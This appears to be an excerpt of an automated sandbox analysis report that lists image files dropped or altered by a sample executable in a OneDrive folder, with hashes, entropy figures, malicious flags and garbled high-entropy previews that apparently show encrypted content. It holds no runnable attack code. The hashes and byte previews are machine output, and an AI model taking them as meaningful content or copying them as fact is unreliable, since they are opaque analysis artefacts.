SHA-512:	028E220EA7389293ADFD0327746E75EC8599A21E466C2F3C18F1E712D402BCBCB530A8A10FD1D30AF846D7FF9AC2C5BA96C1150087D87572AA597DFDEC1E7E74
Malicious:	false
Reputation:	unknown
Preview:	<svg E.{.5A.].. 6....n..!.@.?.....R......]!..&.pt....51..Uj..8?...0..\P4.<<..MJ".....QoO....;.Y'.c._....-.. G..rm..gA...e.5..1.L.......o..D.._...k.....H.u....l^....n.!..._T....f.......sl.&/....r..u.+-..F...W..N..].....f.W.b.o./...$..a...)..%.T.....Y{dg..3K..H.=.q.tZ.?.... ...N.( ...:...;......L(.P.L.:a\j..D.....V...\.p.e...E#..Z....Z)U.~..x3...,.AC....A..:..3..q..].....q..bU..@....a.........."...N...V.Q.t.d..KY4.}1}.Z......H.Pn..8....wv......../../...f..X~....c.7...%.......z..c..@L.].4.......D.n......PE.U.K..^I+.M..mj.t...?..5X_........._..........1.......X.C. .....m. ..<.j.....k.m.k.!5..q..Y&..4.N{....\'w.........Z....m.3...cDNZ.....tO5%.......IT...d......%..T........T.]...R..<}19\b}.T...."..:.5..j6.Z...;3{.4"...!....9G..'I_^.i%.Z.q.~......J..._...U....t...k..m..R.d.i........<9.-o.C.bj...K..a..!....a8.D.}......}.:.u\.a__p...Z.r.pxd.bN`..=...C.......U.&.....B../.!pz...e..{gS..#....\|J....mui..Oq.....>......M...N+J.e+.K...s.Ed.1\|

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\warning-symbol_grey.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	580
Entropy (8bit):	7.576929743215862
Encrypted:	false
SSDEEP:	12:tQ6nUUZ+oFZTBF4PhG9DRnapXaTwEq9SiK5FT7o9qtcii9a:tQv+FZFmpG9DRa+o+F3OEbD
MD5:	EA08152D88BF772629EC008040C19F20
SHA1:	0D6606FC346DC345A5F86EDB5F762C7C688FE947
SHA-256:	4D937887787F4C85403181EE566643C7BAF7D88E6810D653E2B7E6173DAA72B4
SHA-512:	01A66601C44666387C6AB941146B7F3D24F7D326B6AC3C77889BD598B19B844C7EE4AF4D1D7C3F5067DA0DE75775EAE12C817E4F66E9FB3C2B5E1394041F1375
Malicious:	false
Reputation:	unknown
Preview:	<svg ..K.i`.B.9[.Ik....B...Z-.`.V.....SG....8...;..A...[v..r....UR.....@......1..1-...6O....w?..$.Z..~..?I6TU0...fM........T..s.R........nG0...U.i.;;Uc.).....(.}.T.`I...C.......n.9.<......V-=.......$...........NH"eE...u<.K.~..^>.......o..p.Vy...<.?.\| /.T...2......@.......6.U.....0....1.1.A..Js.@[........`.@0.J.c.C..........z.XY..T...q...&.gl.(GE.x..E9T.<..[0....G*..R.v..l.....f...m.[a..=4...eh....c.h9...<5.&J..@.8=O.h..K.iQ..`.z....=....P.q&..w..g>6s..2..G.S...,.....M....'..5a.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\waterGlass.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	2171
Entropy (8bit):	7.904672519320061
Encrypted:	false
SSDEEP:	48:aDW4W2DhEmxH/IXxJNEuISyYILj5yyZFlZtbFnXZIBgmS8RGD:mWZmxH/gNE24jNZHnIBzXe
MD5:	2E9E4752F6A89D49F9E9EBBB14EECD49
SHA1:	37ED34DA623B9808B1A0D1306A5B5A25B02E0506
SHA-256:	06B83FCDE5442EF96928F9D538DF28B3DF1256F13DA902CD259415DB754971B2
SHA-512:	917784012E7B3BE5E9B6F5E61A55BB053ED69A60B44316B1EB85415EDF68D88FD7DFB8F35272702509FF22D8114092B4A5F313A51DF8F13D85A06B51C1BE0E74
Malicious:	false
Reputation:	unknown
Preview:	<svg $iY..w..>7.....p.3".yv.l.:.>..t.........5rL.2.%P...s......KjN.u.[b.Y....B.5..qME<.g ..!4.?....{d...2..H..T.W3,U...[...\.......9!.t.l.L.....G.Q.K...j....B.<..4Z..m..E.....=...=.[........1..$...RE.H.j...r...8..._F..%......./...f2...oU(.s.n}...)....._9.^"....swcUbY.../...j......[.[..S.+> ...R...g.n.JAv.O..[..zx.).MC...Z...sB.'..........?....3.>Yy....#.z.<V.\|..+............b...G.......]...4...bt.M..;.....W...#C.?.cs?....C.u.9..k......8-..%.......Wq.V..{m.5.t...V...........J.......``.0.::.\|.p2........}~1.:.....(<Z.E.;.m..q]..D...(n..r..B.h..H...e.B.....h0..KV.P.V...:H-.7..f...?..W.9....x.n....v.m...zl...g.o.$...M.k...l...H./...9.-BD-W..R.z$...S....>.\/bx.>.h].../....I8...cyb..\e4......-Q...:.:......G.k.......T......+.=.0.DfQ/...L.M>.&peY.m..s9...>..)..7.+O...@.w...."................;Bn.x.....%.P...7.v:5..>.t`]..\|RI3...4....._.W.....6..^h....%".)o.zY..Nh.V.Lh@2<.3I.4.#4..$}\.,2..V0..H.E+;7.w.\|w..q...!...EV...E......K.......(;..hg.9Gt.a...7Y.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\acmDismissIcon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2623
Entropy (8bit):	7.9240678477769935
Encrypted:	false
SSDEEP:	48:CqIrAgRK2AXUghm2w3t+KR2iE8S7xiEVcdEkJxBUW6gTdFEdQmb2pD:CeC5k1S2VJ7EXFxBUWxK3ba
MD5:	C46733F8BA3005687F49087311A44645
SHA1:	0AC7276B596B72CA0929C2DD9F9ACD001F68D672
SHA-256:	D589151F9283F2CB13AB6F97C78E487CB817CB4A08E3EC376DA1C020D0706F13
SHA-512:	2B630E5896878AF2126B2B7F6B86BC3DF7265F1EB3E9BFABAC2D8657EEE125EC78C28ECD17B26B04D1D9CA16CB641A100007EB827564A6DF8B35DA2CC923C1C8
Malicious:	false
Reputation:	unknown
Preview:	<?xml...Z.g.$.....Qt..W)u.1...........E\;E7\|...S5....&...PJa:.Q.f.\.O..%.}$Dl.3...G..o.[^i6.K..S..%../...c.02......J\|.....C;..4C.\|.......&.C>k..U._.h...$...<lr.........<.......e.?...@x.2.)]...a I3v.fO.2V..WS..U.F.p..m`.]......1..u......5..k.r.,..6.9[....pu..T....L.41<..9.F.....Y6..h Ko.vk.,1;\|L....s..q....,.j`..Y..!...(=..\...Io...W..<~.q..Ks..Ae.9ui`......C...D..'.........O...XH.?..."....S].......=r.Ny..(...=M..![{..\9...Y...\| I......X.W...f.".$.+YS$Q.&f....:.k0..'.Y..T..f.2i.S\.#._.g#R....@P%.....&.G...o....%<;uq..R....\|<.^...q.+..MW.q.yd...).S..E..U......WX.@...%\|..].SJ....3.l..I....~.Z.g...x.."...~rN.....4.p<.]wT.......M.w.....f.........k.[.>...Uja.~".....2B\|...k.:.w.v..4.~R.6.u....^.n.5...\gP...nF.'cd...#..H..-.I6F...,c.V.u/..V..4...t....S?..;S.....E9...V.?$....P...s.L..""..?.'h.Q......RW>..........^..cp&....fK)W5.[.J.9~.K:..].X...E1..".q......SGn.5q.._...`...hM.J..........o7......Y.[...X......T.N\|....Rj..\|'l.....<x8t8..:.b0.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\acm_low_disk_space_online_only.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	45627
Entropy (8bit):	7.996052412690421
Encrypted:	true
SSDEEP:	768:Fw138vBjt2HKEgaaviWCEFDayJsazPU3KoAjY6XQus7PQHFWVfQlNP6cWvvaI/:ZvVt2sdviW1Dxhb8KoMpQuMVfe16///
MD5:	AA48B50BE005A050DE964EF73C123E78
SHA1:	995F608D01FEF8E4D80CFAFB46AFFC6AB96D8648
SHA-256:	B869324E9E09202ABAC605D24E760B132274F7D1B7301BF90B66D931AE1F8BB6
SHA-512:	18188DB35E0D16A654D195037C18610235885658A89C43B0972CF99E010905B2FAC1CDE7D0B323BDA4F599145A40500C9E04963317A88AF4F612D3D3309F9899
Malicious:	true
Reputation:	unknown
Preview:	<svg :C9P9g.....5..l.\|.9.f.;1...k..i=.....Qz. .r.V...Yr.3.. T..Z.....R..k.d0.Ay...yX..6#...?.-V9.9Q..}H..3@.`......=.....N.......{..Nz}..@..Y./9y.Q........S....I..p..&....\|....(..._U8S\..j...r{g4..x.....1..6..]..`...h,...kl..Q@1Z...`7....~..<.=..M...7................i.g._../...2......).c<....d...;.J)...\|.1....QHl..e.a......ttm.R...A..+U.FCV6..._T..dW.........K.Q5].]'..0.............../...9.s.....Ere!...H.X....}._.T.....Q\.......]%{....I.h..Y.5.{X.=..E)..8.i.Q...y"6/.t........W.......U/@.#.J.o...}x.A.....1..$2:....AXH.!l!.o.Aw...s(BIn.&.a....1..k...../ez..h\|......]..mrr]..fA.d>..].87.&..:...q\..T.......51.....r.>.-2.&.r.i..y...*%4..b..U-s...;I...s......n..L.]...?Ez.VtQ..=...UO-W.L..n.$...n..n...3...%Qq.......].i.V...N..@"..'...o'.B.....wZ....u.nb..mA./..}e.iQ2...g.^..T..5.j>....{M.......=D.x..........H......0.)...x.PZ..vU.H...].myS>.9<.}.x.><.YU&d.xg.1.0...5!7Tb.l.1.w..J........Y.uK......tV:.....P..V..hg.'..e.!..0\|.6L<...E,..;

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\backArrow.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	564
Entropy (8bit):	7.58763680415955
Encrypted:	false
SSDEEP:	12:t7E3w3iTZKB8OHQGRSLlVV74xyXoPLxKF6L7jEh+SElubryWWTdtcii9a:t7Uax94qYGLxKF6L7jERE8bmWEbD
MD5:	C0B4F0EA3EDEFEEC8CD63C5AE82368AB
SHA1:	1BA2C071A0D967B06417C3C3F8324465EAD0B782
SHA-256:	130F4FD6EDF3BCFCA611F77FE803E0B359CCA28C718CB3374AABB8DA109B3743
SHA-512:	3F7DBEE1DCF4DA456ED36CC9B107C85E1873EBCA0F777E9B4E4AD584E64DF2C4BF7A6C58A46F7C62A6288229203D959E9844CAC582D216C302F355F1604177D0
Malicious:	false
Reputation:	unknown
Preview:	<svg :.Dy. .....i._2.RK.....\..?.l.*.vs...d.....M%):.......$.Ey..Q..r...z'....N.....3..l....iL..MF$....[..J.s.c.E.v.X..,mt..\|.g(..Fc.E#....%2p._s...s...D.x.u....RlD..DV.K...3..}..9u.#.....jA,8.<.uy.$&.Z..D"..-.`.../...C.:.F....p.+.wF......P..'..-M.9...\.'.g. ../8.W.....d...\|.....#.H,g..Ca...{.x}..,...{._.>..]Xt...@=.<.-JY~0Y.3.."s1.H..>...B~+...LVu....K.......5..]T...p......$n..,.k.._.......B..2.m...a../&.....2..x......x..D....'.S....i..Ab....oo.i.u:5'Mc...dK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\blurrect.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1135
Entropy (8bit):	7.802270387459609
Encrypted:	false
SSDEEP:	24:DmtoDYDka0xLghEeTKjRXL861tO0mlzYuuILuKSoNrySKjIjbD:DxcDkfxLtZj1tOHqIBN+juD
MD5:	49ABE667804FB71CACF8B1A27E9F4EDE
SHA1:	433E24170BE0A8252F2C0C55CC0B87F59795E9A8
SHA-256:	4A8C7A89035D16A5F0DAC5FD702936846EFF1915F2BF321F596D16865D71B657
SHA-512:	319C56D1E124846C33FD5A80D1443757622034B984A318A66B37634C0E97D5D0B47D3C208B799A1F8C758FB728348DBD845F0F11C83099924D155E447297F786
Malicious:	false
Reputation:	unknown
Preview:	.PNG...b....H/.{.....e...c.........f.S.x...9/p....2......9.K.........g.........?:,....R..6.... .y..E..i..3......O..J.......B?....UT...8N2...S.6.?3.1._\/-...\....w......K.4q........HP...< .YKP..2.s..mP..<.p:...Z.....\|(...#....%.DA.R.GH...O_Y....0S)u..k.8.Vk.._......1G%......q>.JY0.....[H>..r..Sq"c...,."....".}..2.At..QoTf.S.sK.EQGB./..<...N....../....H.+..NVbC.v.3\|.......;......v.B<A'...w.Q!{.N...&....X..}...R.....4..u\|Q..;z...Z.......}.>y.]s.C..z.........CVfQJ.b.E..+.......lp.\.. ._.~.Q..&.G..>..}.:C.f..._Wr...iJ...o.o.....R......3v+....Q9).H.".../$ O...OoGe.7.]..*....R.j.jZ.R0MDZWM....Q.'}.......Jf..~. ..o..,=q.T...?Xm..,..Z..if....(.2..d..w)O.9<;J....\.3...mX.M#\....p(W..m ......Jr......#..?JA......\|..........80Q....~%.....2"..[..).w..........c._{..8.95...qI.a...B.N.w.\.6....+..b.m.....P5n..8....Z}b...Zcj.-......n..'<...ptX..9..<.(.Y...&..5IP.y.mE..}.....68U.W{wIbbk.._cy.k+....d....Bu.nY...K.N..)..V.ux>..#YOK.B....J.b.....SN.V..5.m?\...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\cancelIcon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	979
Entropy (8bit):	7.785277105996358
Encrypted:	false
SSDEEP:	24:fWvG9loGvcA9idcwXHYD2sI1NmeY9xDqwbD:fW6NvUcU4yXceY7DZD
MD5:	62BD22FFCD588D9FB4D9348DCA82F793
SHA1:	AD748FBD4F0B690AA4C8128D7E540F8D3ED688A8
SHA-256:	1C43B5B74CA42E2AFC1132092835ACD917092C0E36DC8BC3EE765FC8B5712E9F
SHA-512:	40E63C688CC6A67AC7DF8E04F8AFB9EA9E179C71CC94868864DE8AE9C5D6F337FF3648F1B8F4E50E19F021EB2DE09BF162C4DE7DEC8C13885485AA3163571B22
Malicious:	false
Reputation:	unknown
Preview:	<?xml..KJ..g.p.........zZ.I..)<.. ...J........e#...Q.X}./..#;].3.d W9...s..m.G.s. o.)..f.Q..A ....D...'.oX...........m)...e.U...#...b..c,x.?.YL...n....?K..f...s.Q..?rb..d.a)M9..,.2K...Jz..fp:.....6..g.,y...).t.........L.@.a......qN`.W..o...."......(_./M........c...'.$..%.H..S../8..1#.d....L..k..#-.,kW..(.K2o..-..c.T;=f/)E.........tH.......uPXp.6..9!=D..V.u....~.........>...c.{...#Q.A.O.q....[.o.,............\.{.+!..3.....Z.....z.%U.\|}x.oF...`Y..s6.ce...C...E..q.d...z...>..?./.<.C....4.._g..Ko[R.^....=...PfN....U..c<l>E5.....R."..cXG..1.%?...;....tN.....X.(.j.@kB..y..bR..(.U.TmJ....i..}r.V.."....xB.7M.0.?..O.#."..Rm............;.....kCl.{j.#RL...q#E\..M.2]dC.....IHzl.11..c....^.1.s..Y.......h..bS.o....$YnF..}....x3...KYA>.&O.O.d.;..A.k.s...G.......@......s.M..P...n&.+z.S.....Wzy..=W<..ut..wh.@."^....0.Y..\......G.J.........~..ZK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\checkboxComposite.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	551
Entropy (8bit):	7.648834521673571
Encrypted:	false
SSDEEP:	12:tu1MpUpSKMS/NsT0SYiq54GdTyHi8gBAJiCNbtcii9a:tppdW/+4w3Gy4AJ1zbD
MD5:	0DA5C07CF8521CBAE451B22D8E46C614
SHA1:	224B141307796BAA1C8505F35ACD319E16476423
SHA-256:	D26FDBE3A27A5A0D389DCBD95B6E523F75C712C84D22CA58B666876FA28E4AE6
SHA-512:	ABE65BCCE7E2D36544E5344C0E0B0A5377530324D4F65B8E972B4C25C25B6F994F146C23139A9564302B073A9E893C26108329814E686AED3EA5265D9AD9E137
Malicious:	false
Reputation:	unknown
Preview:	<svg . /$...>.........Q..NT;r....Z...[a..CV...K.79.4.b..p..$5]X..U. R.h.o.....R;>..v.}Y.:...V.@xs)...h......u.&......Ct(.4....H),]v...e.y.R.....jIa_.(...L....xwH....'].Y.\.C...._O-,...........k.c.>x9w.6.........P.}..........&N:#.FV\|........lr/)..3C\...).&.v.F.#.~.......?.U....k.j.dN.'S.YX.)@OY..=...{..........i...QQ..O...qm......W...9(.z=..a...z....$...K....%.L.G.J...p6.g..I.@.&.b.\.tu.3%..y{v.\m....$..ayHhAu./....l..V^\...f &..z.K.p..v...Z.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\checkmark_finished.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	545
Entropy (8bit):	7.534358156943381
Encrypted:	false
SSDEEP:	12:tO5rdy/SIRo+DmaUMsKBbVOKDL0BVOsjik7UfVJDNXtydtcii9a:tO12RRo+C3MhRX0BVbjdGVRNdy/bD
MD5:	C13197042DDB771A38A09E73017724D8
SHA1:	D960C5D7FA54E975B7F52EBA807F0ECF89C2EF9A
SHA-256:	234865EF32D1A40ACA2ECDEE8F98BEF6D9821D9263029F117B3A14B5ADFD7448
SHA-512:	875FDB27925484441F2F2CB070F7A90CA6BE7EF5B71614BD5C5BA5A5B53AB471C729A55A051713E74DA15C1112FA191FB21F1BD2E0EC42B49FD189841E1F8F0B
Malicious:	false
Reputation:	unknown
Preview:	<svg ...~m...'..U.1yH.5.`C.P.............s@.y.O..y.3.O............>.. }..-S./feu...H...R.X7Kz.C....1..m.kK...5.r{.R.E...)....Q.....D.cM6].w.qGENt.}....j....^.H.@..`V.......e....\K..f.,.@....5Q4k.].7:..?.A.-#}Kg..qiQ7..y.iI.wYE...{.{..T.!c.t:x/..wV....L..bLfw...h...d..Nn.J..Fsf...i..y...2..3.'.FNj..V.Ke..qA./..`..)6M}Z.....V#h.=S.k)h..C......N..s.,...(.?...K.p.K.1..].be..N....r...Z.).L=..y..1.zw..;PHo......8!.X.....Z.u.2h...G......Y...K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\checkmark_hovered.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	724
Entropy (8bit):	7.717414508095918
Encrypted:	false
SSDEEP:	12:tCwU7m2IxGwg5+FUWtZp4VwwlredBVaCONpxfb9NFdzIRTKcub1Ncytcii9a:tom2Sj5/iGwlrevgxNnIRTDubzcMbD
MD5:	0D2AC44AF34E2A6D2E9CF4D751AE435E
SHA1:	6C7D5E299833D8D5C1F19AB0D214A91EF02C7668
SHA-256:	BA319131B9E218CBA652BD8B33D07B945463F6CCBF7B64A0D8D63FB67087B32F
SHA-512:	3CDC07CA7C2253DCBC77BD32F390E7056D0A0ACF661F76C330FA499745EE0DDA35ACF39DC589886E21E25F8ECD4BB7A39E65AF0C86D3E5437A826B19795E1EA3
Malicious:	false
Reputation:	unknown
Preview:	<svg ..9x.`....h...s..cW......B...\|#8.H)W.6......A.R.1..z.u......Z.`....N.`U!J-[.O.).....\|7.,/D.S.}L..3B...,.....{...%ZI..\Ih.6.l...].ph.......)e..5.g.. upO...\.,.1.......q.N..K7.bL...a.P)_V.....u....y...J..Oi/.~N....5...G....@.n....p/S?.ji-c.z]..........]~.....%JA.0.e[=..+.~........&...o....cUW..(>...ac.w2.q...<...d.~=M..@^[.H.h+<..[P9Ks..L.e.y...;..g...b.g&F4.Bq.> ...a\..dz]..c6 ......;e.$.\|.C^.6..~<......y.?8....O..}3".:..J...}.m.qr.<.......4>.B......(.>..V..zm.!.L....(D..N^e....v. \|.b.............@.U.c..k..;..../.2o+.. k6/....l....#..X..}.....}.s.T.u..n....\|..'..z+=.F...]P...'"xs..Q/S5.YFg..0..h.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\checkmark_in_progress.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	725
Entropy (8bit):	7.727066895578908
Encrypted:	false
SSDEEP:	12:t04SNWbvdzVp9KpBQyCETLNQyWhR7qK0mdjhUaCRENZviJKymFbQyKoOhR8cYtcq:tMWhzxUQyCEtQjvqK0mXUXRENZvFymFH
MD5:	6A5EC9BB855C00F6AA0F51C7092D9D38
SHA1:	ADD5B10168BC8B42E45958DC5B69B5C7FD7A44AB
SHA-256:	1A3DC847C75729B11ACDA6F3F12BD3608283A0A725F3E5E445F49C2EA77AAC97
SHA-512:	E0D0A6A274F3AF2E58703F4611BEA2CB082DB0516CAD63BA34C107900AD00EEDA4B69EFF48C4644A927DB14258996049EF6BD94059E2936D4548A42575F7D244
Malicious:	false
Reputation:	unknown
Preview:	<svg ..g...`.@AF..n.,ZH...c../...Q....u.qv.$Jn.@...\|......D.......a!,..Uh:..K.8.0....x.J..M....[!C.:........\|..z..u..;.......V..Y.....Y..+.4.....8..T.=..7..}%."&.dN}.m..k#!.y.....0g....../..$.hw.l.U.(A...Th.g.N..;......a...9..dtP..iR`NDd.+..8.8{.`...]g....W.u.@4(...K.......#o....^.6.}?..[......eU_3._..gN....X.g..(.c..tZ..m..+..p...Z........==.X.......A.fZ...q.t.[Ih..zw7 .=T...V/-.......!O m!..{.h......[ ..Mx....p.\|s..m9....<.c.ol.{..,:....y....l..RG.....<...,.`,..~0.w.e.w.........H....nL....,.._...>5.. ..=}l.../......O>..v6.^u.~.[Y..mf..........p..N..0.....A.x..L...\|..8;N0:3...T.,L...I.....mH.M.#t;..}..].K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\checkmark_selected.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	722
Entropy (8bit):	7.691571630200729
Encrypted:	false
SSDEEP:	12:tOxSPdCq1jhbRAVx4ePe7BGN5kLtwDYzL9SO4t0W52Jdj6nWIU7Stcii9a:tOklC4llY+ePqBckLtwkLEfqQAdjenbD
MD5:	B8293B9629CDB21E06F0BB7F08DD76AD
SHA1:	5A78E0DA4321C4E47A7F0798F82A0C529F7E2495
SHA-256:	853DBF3F01E85B9AB17D85D7AAD3570FF0FDF27B32CE6C3EE1637141F6C2D498
SHA-512:	3B45FF726BBC4CEAFBD8FA2CB769694365B43337BB06380915FE65093E26BB4BF5903126BF92914C7CD9F56683B6EDF2B70B29668FAEEEF069A9B01206BA97D1
Malicious:	false
Reputation:	unknown
Preview:	<svg !..6.T.d.u3..b.A....Dz.c~./.].&.8.M..H^.."..WI.@.>..#....../._BJI1M;rnr..d_.7?z.,Zw."u/E.....'...@...[..8`//.....F.p.><.Oy.G~.}ii........v.n...R......T.`^G...;4_=8.'.....=...\...V.....]\|..n-5E.%\n.Q.....v.J.>.Wy..I.d..l...<......kdTd\.dG....A.....yp.QcI...k...b.,F>@2...g...]_.b.F%..ZE.J.."M.\|.;..t....R.....5.^ .L.l.=v..?eo. 4..B4....5z./d..%Mx..Z.o2f.!w..O"`..(.VN...n...~1.6f......9...j."0..0}.#..\|.GT. 8..c{....D..X.Yd.^....F..8E+.].U[..!.<.....u...F..9.w....3..&.j6Ibs.B.R...A...O.....,G...5.6.}........1@B.L.(.......~...7.~..P..`.V./wG....@....h.gy..~...].u)..S..._..IB...A...2.J.[SJ=..X..8....2.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\chevron.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	629
Entropy (8bit):	7.67285563945233
Encrypted:	false
SSDEEP:	12:tDdBI3tot8qnuqrC1cVKo9Mw7nobln0rQUK0m89YMVVj4/EGJqeCcCiOGnDtciik:tDdBIGPnuq8sKoDnAl0rQUVVJ8/ELeCU
MD5:	D36782C030D9C93796586BD065457868
SHA1:	464C51F517634111127D5294467A0EAB7D2F5027
SHA-256:	45452C48388F3FD96885C768D9764E47E3C35AAC35F585E6A57AFCB75BD983CF
SHA-512:	6F7A0DF89553DB368BA5F96DC57B03528F0A5F5D2CFC20DB4E4495DFEFD40FD9FF11366AB0F38AA507F6DBC261866FBF7AB99ABE5A8C25BE750E81D6B670EDF6
Malicious:	false
Reputation:	unknown
Preview:	<svg Q3.VT.....q.......rZ...+_.....yl.=.f...qz....&....,U.0.Kd.W....Gd.t]...zY.M.~{. ...gPh..P4k...:q.D8._.....j_.qo...........y.3q.?:>..&..............5j..h..T.\|..9.p..R...33.]..AP..4p......R3.f.8.[.r.....e.V8C.Y....L.B...V....Q..{.....s...T.....MoY.t.V(..JQ./F.e)8..[..x..+c;..81....H_..;.T...)...s.?d<.X.+O.f..cD..BP...r.......K.~.W.....`H....fhR.._....`.p...Q(].j.g2(r.....$.FJ.........#0A..........M..$.M.:...T..F.?.ND.r............ne...@.El....K.$.."y..:.S@..ZU.fUC!.V-..4.;.g(..c/...1..m.....]v[...v....W.qM`..G.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\chevronUp.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	598
Entropy (8bit):	7.5737548486104425
Encrypted:	false
SSDEEP:	12:tL6pXUkMBzsvOghUx3d8b9BmWPlEP+yo2IiD8LOCiM4DFStcii9a:tmpEk4uhUxKbzlZyo2fDhxFabD
MD5:	CC67B9A4B4A7E5384F2993008C0BCA35
SHA1:	9E08FB3ADDCDEC3C28A64B16A93596A426172909
SHA-256:	D2D99D383C27C0D6F39CC6332FF4B1D78C711DE897A3DD48AD6A293144C58227
SHA-512:	3410A1C53FB28CFDAF141FF2E1B54497C394D18EC025B9B6FA292918C4374CB04EE0E79F0435102F289B60AADA46B93359C40335B1F114E730B9B42D9AFF26E2
Malicious:	false
Reputation:	unknown
Preview:	<svg ..FV....q:J........?.p.hz.3.`./(]. W.2.#.bi#.fR......UQ....Ue...`....G...$..`...b.]..[.......+......+.Y....!..iY.c8P4SUb.c.y...E8.K.>..-...LO.....r...b...$.q.y.6..\..n....^.....t..F..YB.=.~..&......y.n[k.Ri..-.5K...c..owE3....%:..%.#f.q.......p..y..6a9FOu.KN7.@....\..8./......5X...`E.....{......Q9[~...`igL].O..,n/....u.#..x...Q...be..bn.BO.....y.647Y..*..\|...+E~....sPw.b..K.sZ......`.H...c..:......(.3^M.ho+......vd..., m..Z.hXI.iL1....ao.. ....Fl...nW........qFLo....`.....R0.zY.......K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\lightTheme\clock_icon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1269
Entropy (8bit):	7.835649767571589
Encrypted:	false
SSDEEP:	24:USiymGQQd+I2lUdfhkwqCG4Kwd/7fIrrzwPrZVbcJIcgksOqiWbD:LQ9m+NlwJjqCRKsjIL3mclFqiED
MD5:	3104BEF049714455897C3EB100ED45FB
SHA1:	18FC8727DCB812CDCED238429AABB93B45A54641
SHA-256:	03A5B752DD07C12C911334B3FA5D639DB4902D4B0C787FCD085CA59D0031A63D
SHA-512:	A6A129B6364F02EBA68B72C39208C135C9C73F25AB506B428D0CF49E3824A47EF268AADEAF82944F0E2753BAA3E0994103EBA83ECCEF86616ADF4602B5F945EB
Malicious:	false
Reputation:	unknown
